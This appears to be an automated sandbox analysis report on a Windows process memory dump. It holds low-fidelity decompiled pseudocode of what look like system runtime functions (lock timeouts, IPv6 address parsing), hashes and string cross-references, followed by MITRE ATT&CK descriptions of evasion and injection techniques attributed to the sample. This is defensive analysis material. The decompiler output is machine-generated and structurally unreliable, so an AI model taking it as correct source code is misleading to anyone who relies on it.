									_push(0);
									_push(0x65);
									E01E63F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E01E53915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E01E35384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E01E0F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E01E53915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E01E0F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E01E53915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E01E0F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E01E53915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E01E35329(_t74, _t92);
													_push(1);
													return E01E353A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

0x01e353ab
0x01e353ae
0x01e353b1
0x01e353b4
0x01e353b7
0x01e505b6
0x01e505c0
0x01e505c3
0x00000000
0x01e505c9
0x01e505c9
0x01e505cc
0x01e505d5
0x01e505d5
0x01e353bd
0x01e353bd
0x01e353bd
0x01e353be
0x01e353be
0x01e353be
0x01e353c0
0x00000000
0x00000000
0x01e72269
0x01e7226d
0x01e72349
0x01e7234d
0x01e72273
0x01e72276
0x01e72279
0x01e7227e
0x01e72283
0x01e72287
0x01e7228a
0x01e7228d
0x01e7228f
0x01e722bc
0x01e722bc
0x01e722bc
0x01e722be
0x01e722c4
0x01e722cc
0x01e722d0
0x01e722d6
0x01e722d7
0x01e722da
0x01e722df
0x01e722e4
0x00000000
0x00000000
0x01e722e6
0x01e722e9
0x01e722f4
0x01e722f9
0x01e722fa
0x01e72305
0x01e72314
0x01e72319
0x01e7231a
0x01e7231d
0x01e72320
0x01e72323
0x01e72323
0x01e72328
0x01e7232d
0x01e7232f
0x01e72331
0x01e72336
0x01e72336
0x01e7233b
0x01e7233d
0x01e72350
0x01e72351
0x01e72356
0x01e72359
0x01e72359
0x01e7235b
0x01e7235d
0x01e35367
0x01e3536b
0x01e35372
0x00000000
0x00000000
0x00000000
0x00000000
0x01e72363
0x01e72363
0x01e72369
0x01e7236a
0x01e7236c
0x01e72371
0x01e72373
0x00000000
0x01e72379
0x01e72379
0x01e7237a
0x01e7237f
0x01e7237f
0x01e72385
0x01e72386
0x01e72389
0x01e7238e
0x01e72390
0x01e35378
0x01e3537c
0x01e72396
0x01e72396
0x01e72397
0x01e7239c
0x01e723a2
0x01e723a3
0x01e723a6
0x01e723ab
0x01e723ad
0x00000000
0x01e723b3
0x01e723b3
0x01e723b4
0x01e723b9
0x01e723ba
0x01e723ba
0x01e723bc
0x01e723bf
0x00000000
0x00000000
0x01e69153
0x01e69158
0x01e6915a
0x01e6915e
0x01e69160
0x00000000
0x01e69166
0x01e69166
0x01e69171
0x01e69176
0x01e69176
0x00000000
0x01e69160
0x01e723c6
0x01e723cb
0x01e723d7
0x01e723d7
0x01e723ad
0x01e72390
0x01e72373
0x01e7233f
0x01e7233f
0x00000000
0x01e7233f
0x01e72291
0x01e72291
0x01e72293
0x01e72295
0x01e7229a
0x01e722a1
0x01e722a3
0x01e722a7
0x01e722a9
0x00000000
0x00000000
0x01e722ab
0x01e722ad
0x01e722af
0x00000000
0x00000000
0x00000000
0x01e722af
0x01e722b1
0x01e722b4
0x01e722b4
0x01e722b6
0x00000000
0x00000000
0x00000000
0x00000000
0x01e722b6
0x01e7228f
0x00000000
0x01e7226d
0x01e353cb
0x01e353ce
0x01e353d0
0x01e353d4
0x01e353d6
0x00000000
0x01e353d8
0x01e353e3
0x01e353ea
0x01e353ea
0x01e353d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01E722F4

Strings

RTL: Re-Waiting, xrefs: 01E72328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01E722FC
RTL: Resource at %p, xrefs: 01E7230B

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 57b2a74b9969a2d05dc12b62672c997b31acb18fe729c6905a8f0b409360d1f0
Instruction ID: aff938818d49ce99a235d6daa62e1ecaeddd360dbe1e23f8a4b76041d1ca7c1b
Opcode Fuzzy Hash: 57b2a74b9969a2d05dc12b62672c997b31acb18fe729c6905a8f0b409360d1f0
Instruction Fuzzy Hash: B45127716003436BEB119B29CC80FAE73ADEF94724F116219FE48DB285EA61E841C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01E3EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E01E3EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E01E2DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x1ef793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E01E116C0(_t39);
				} else {
					_t40 = E01E0F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E01E53915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E01E101A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x1ef793c; // 0x0
								_push(_t85);
								_t44 = E01E11F28(_t71);
							} else {
								_t44 = E01E0F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E01E53915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E01E92306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E01E3EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E01E54FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E01E63F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E01E63F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x1ef20c0;
								if(_t85 != 0x1ef20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E01E9217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E01E63F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x01e3ec56
0x01e3ec56
0x01e3ec56
0x01e3ec5c
0x01e3ec64
0x01e723e6
0x01e723eb
0x01e723eb
0x01e3ec6a
0x01e3ec6c
0x01e3ec6f
0x01e723f3
0x01e723f8
0x01e723fa
0x01e723fc
0x01e3ec75
0x01e3ec76
0x01e3ec76
0x01e3ec7b
0x01e3ec7c
0x01e3ec7e
0x01e72406
0x01e72407
0x01e7240c
0x01e7240d
0x01e7240d
0x01e7240d
0x01e72414
0x01e72417
0x01e7241e
0x01e72435
0x01e72438
0x01e7243c
0x01e7243f
0x01e72442
0x01e72443
0x01e72446
0x01e72449
0x01e72453
0x01e72455
0x01e7245b
0x01e7245b
0x01e3eb99
0x01e3eb99
0x01e3eb9c
0x01e3eb9d
0x01e3eb9f
0x01e3eba2
0x01e72465
0x01e7246b
0x01e7246d
0x01e3eba8
0x01e3eba9
0x01e3eba9
0x01e3ebae
0x01e3ebb3
0x01e3ebb9
0x01e3ebbb
0x01e72513
0x01e72514
0x01e72519
0x01e7251b
0x01e3ec2a
0x01e3ec2d
0x01e3ec33
0x01e3ec36
0x01e3ec3a
0x01e3ec3e
0x01e3ec40
0x01e3ec47
0x01e3ec47
0x01e3ec40
0x01e122c6
0x01e3ebc1
0x01e3ebc1
0x01e3ebc5
0x01e3ec9a
0x01e3ec9a
0x01e3ebd6
0x01e3ebd6
0x00000000
0x01e3ebbb
0x01e72477
0x01e7247c
0x01e72486
0x01e7248b
0x01e72496
0x01e7249b
0x01e7249d
0x01e724a0
0x01e724a3
0x01e724aa
0x01e724aa
0x01e724a5
0x01e724a5
0x01e724a5
0x01e724ac
0x01e724af
0x01e724b0
0x01e724b3
0x01e724b9
0x01e724ba
0x01e724bb
0x01e724c6
0x01e724cb
0x01e724cd
0x01e724d0
0x01e724d1
0x01e724d4
0x01e724d6
0x01e724d9
0x01e724d9
0x01e724dc
0x01e724df
0x01e724e1
0x01e724e7
0x01e724e9
0x01e724ec
0x01e724ef
0x01e724f2
0x01e724f2
0x01e724ef
0x01e724e7
0x01e724fa
0x01e724ff
0x01e72501
0x01e72503
0x01e72506
0x01e7250b
0x01e3eb8c
0x01e3eb93
0x00000000
0x00000000
0x01e3eb93
0x00000000
0x01e3eb99
0x01e3ec85
0x01e3ec85
0x01e3ec85
0x00000000

Strings

RTL: Re-Waiting, xrefs: 01E724FA
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01E7248D
RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01E724BD

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: e5cc99d00d00905b9c63380ece3f48979cacdc6ae83b4dac8ec3ec23d8bcfec3
Instruction ID: 3bd794429224fd522cd6a7c3b6f97f6353cb4d7e5ab93583d56296b2feb1e755
Opcode Fuzzy Hash: e5cc99d00d00905b9c63380ece3f48979cacdc6ae83b4dac8ec3ec23d8bcfec3
Instruction Fuzzy Hash: 5C41B9B0600246ABDB24DB68CC89FAE77B9FF84710F149605F7559B2C0D735E941C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01E4FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01E4FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E01E4EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E01E4EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E01E4685D(_t167, 4) == 0) {
								if(E01E4685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E01E4685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E01E4685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E01E28980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E01E1DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E01E4EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E01E4EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x01e4fcd1
0x01e4fcd6
0x01e4fcd9
0x01e4fcdc
0x01e4fcdf
0x01e4fce2
0x01e4fce5
0x01e4fce8
0x01e4fceb
0x01e4fced
0x01e4fced
0x01e4fcf3
0x00000000
0x00000000
0x01e4fcfc
0x01e4fcfe
0x01e4fdc1
0x01e7ecbd
0x00000000
0x01e7eccc
0x01e7eccc
0x01e7ecd2
0x00000000
0x00000000
0x01e7ecdf
0x01e7ece0
0x01e7ece4
0x01e7eceb
0x01e7ecee
0x01e7eca8
0x01e7eca8
0x01e7ecaa
0x01e4fd76
0x01e4fd79
0x01e4fdb4
0x01e4fdb5
0x01e4fdb6
0x00000000
0x01e4fdb6
0x01e4fd7e
0x01e7ecfc
0x01e4fe2f
0x00000000
0x01e4fe2f
0x01e7ed08
0x01e7ed0f
0x01e7ed17
0x01e7ed1b
0x00000000
0x01e7ed1b
0x01e4fd88
0x00000000
0x00000000
0x01e4fd94
0x01e4fd99
0x01e4fda1
0x00000000
0x00000000
0x01e4fdb0
0x00000000
0x01e4fdb0
0x01e7ecbd
0x01e4fdc7
0x01e4fdcb
0x00000000
0x01e4fdd7
0x01e4fde3
0x01e4fe06
0x01e61fe7
0x00000000
0x00000000
0x01e61fef
0x01e61ff0
0x01e61ff4
0x01e61ff7
0x01e61ffa
0x01e61ffd
0x01e62000
0x00000000
0x00000000
0x01e7ecf1
0x00000000
0x01e7ecf1
0x00000000
0x01e4fe06
0x01e4fde8
0x01e4fdec
0x01e4fdef
0x01e4fdf2
0x00000000
0x01e4fdf2
0x01e4fdcb
0x01e4fd04
0x01e4fd05
0x01e7ec67
0x00000000
0x00000000
0x01e7ec6f
0x00000000
0x01e7ec6f
0x01e4fd13
0x01e4fd3c
0x01e4fd40
0x01e7ec75
0x01e7ec7a
0x00000000
0x01e7ec8a
0x01e7ec8a
0x01e7ec90
0x01e7ecb2
0x01e4fd73
0x01e4fd73
0x00000000
0x01e4fd73
0x01e7ec95
0x00000000
0x00000000
0x01e7eca1
0x01e7eca4
0x01e7eca5
0x00000000
0x01e7eca5
0x01e7ec7a
0x01e4fd4a
0x00000000
0x01e4fd6e
0x01e4fd6e
0x01e4fd71
0x00000000
0x01e4fd71
0x01e4fd4a
0x01e4fd21
0x01e5a3a1
0x00000000
0x01e5a3a1
0x01e4fd36
0x01e6200b
0x01e62012
0x00000000
0x00000000
0x01e62018
0x00000000
0x01e62018
0x00000000
0x01e4fd36
0x01e4fe0f
0x01e4fe16
0x01e5a3ad
0x00000000
0x00000000
0x01e5a3b3
0x01e5a3b3
0x01e4fe1f
0x01e7ed25
0x01e7ed86
0x00000000
0x00000000
0x01e7ed91
0x01e7ed95
0x01e7ed95
0x01e7ed9a
0x01e7edad
0x01e7edb3
0x01e7edba
0x01e7edc4
0x01e7edc9
0x00000000
0x01e7edcc
0x01e7ed2a
0x01e7ed55
0x00000000
0x00000000
0x01e7ed61
0x01e7ed66
0x01e7ed6e
0x00000000
0x00000000
0x01e7ed7d
0x00000000
0x01e7ed7d
0x01e7ed30
0x00000000
0x00000000
0x01e7ed3c
0x01e7ed43
0x01e7ed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 01E4FD94

Memory Dump Source

Source File: 00000008.00000002.676110812.0000000001E00000.00000040.00000001.sdmp, Offset: 01DF0000, based on PE: true

Associated: 00000008.00000002.676100085.0000000001DF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676264235.0000000001EE0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676278161.0000000001EF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676289837.0000000001EF4000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676298331.0000000001EF7000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676307508.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.676347314.0000000001F60000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 48324bfc720df47dcd9dbb4b7b2a63338ec553be6ebd1ef2781a575ec8422511
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 9991A031D0025AEFEF24CF6CD8457EEBBB4FF45B19F20A06AE551A6252E7304A41CB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

